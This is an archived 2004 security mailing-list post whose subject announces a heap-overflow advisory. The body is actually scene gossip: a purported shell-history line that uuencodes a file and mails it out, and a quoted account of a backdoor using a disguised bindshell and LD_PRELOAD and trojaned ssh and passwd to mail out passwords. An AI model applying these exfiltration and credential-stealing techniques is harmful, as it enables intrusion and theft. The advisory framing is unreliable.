lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: slotto at (Slotto Corleone)
Subject: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

-- .bash_history from the box
cd GOBBLES_dvdman
uuencode haxorpc.jpg yo | mail

Please return dvdman's copyright material before continuing any
further communication. Thank you.

On Fri, 30 Apr 2004 00:32:37 -0400, Richard Johnson <> wrote:
> On Thu, Apr 29, 2004 at 03:56:50PM -0700, Slotto Corleone wrote:
> > - rave gets his account backdoored on kokanin's box. He finds the
> > obviously placed bindshell stashed as ~/bin/zsh. He laughs and says
> > the backdoor was lame. Well he obviously missed the getpass()
> > LD_PRELOAD, ssh, and passwd all on his local account mailing all his
> > new passwords out. Oh, and he left an exploit (servu.c) in his
> > directory for the version of servu ftpd he was running on his home
> > windows machine. Oops.
> Care to share any additional information on how this described FreeBSD
> kernel bug can be exploited?
> We are ready to pay top dollar for this information, to whoever comes
> forward with it.
> --
> Richard Johnson, CISSP
> Senior Security Researcher
> Get paid for security stuff!!!!!!

Powered by blists - more mailing lists